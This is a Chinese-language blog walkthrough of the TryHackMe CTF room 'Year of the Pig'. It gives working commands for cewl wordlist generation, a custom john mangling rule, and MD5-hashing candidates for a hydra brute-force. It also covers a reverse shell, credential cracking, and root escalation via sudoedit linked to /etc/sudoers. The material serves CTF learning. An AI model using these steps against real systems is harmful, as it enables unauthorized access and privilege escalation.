扫描打点
80一个博客地址,拿到用户名
Marco
扫到
login.php随便试个密码,提示密码是一个很重要的单词加上两个数字和一个字符
看了看感觉是
savoia21,多试几个字符得到账密:Marco:savoia21!标准答案
cewl搜集网页中信息作为词典1
cewl -w list.txt -d 5 -m 5 ip
再编辑
john的配置/etc/john/john.conf:最下面加上自定义规则:1
2[List.Rules:tmp]
Az"[0-9][0-9][!?#$%&/()=]"1
john --wordlist=list.txt --rules=tmp --stdout>pass.txt
抓包看到提交的密码被加密了,且格式是
md5:1
2
3
4
5
6
7
8import hashlib
with open('pass.txt', 'r') as f_in:
with open('passwords_md5.txt', 'w') as f_out:
for line in f_in:
line = line.strip()
hash_obj = hashlib.md5(line.encode())
hash_value = hash_obj.hexdigest()
f_out.write(hash_value + '\n')再拿
hydra爆一下
/var/www文件泄露横向登进去后台有
RCE,但限制很多,反弹shell出来没有回显试了下密码复用,用小写的
marco登进去,发现另一个用户curtis这里需要去
/var/www找到admin-db,但发现没权限,看了下发现只有www-data能看传个反弹
shell就行
curtis后面 $32$ 位就是密码的hashcmd5这条要付费,用这个解密,得到账密
curtis:Donald1983$sudoedit提rootsudo -l
可以用
sudoedit来编辑这个目录下的config.php,将其链接到/etc/sudoers然后改root密码提权
在里面加上
curtis ALL=(ALL) NOPASSWD: ALL出来直接
sudo /bin/bash就行
THM打靶日寄32-Year of the Pig
- 本文链接: http://noone40404.github.io/2024/12/02/THM打靶日寄33:Year of the Pig/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!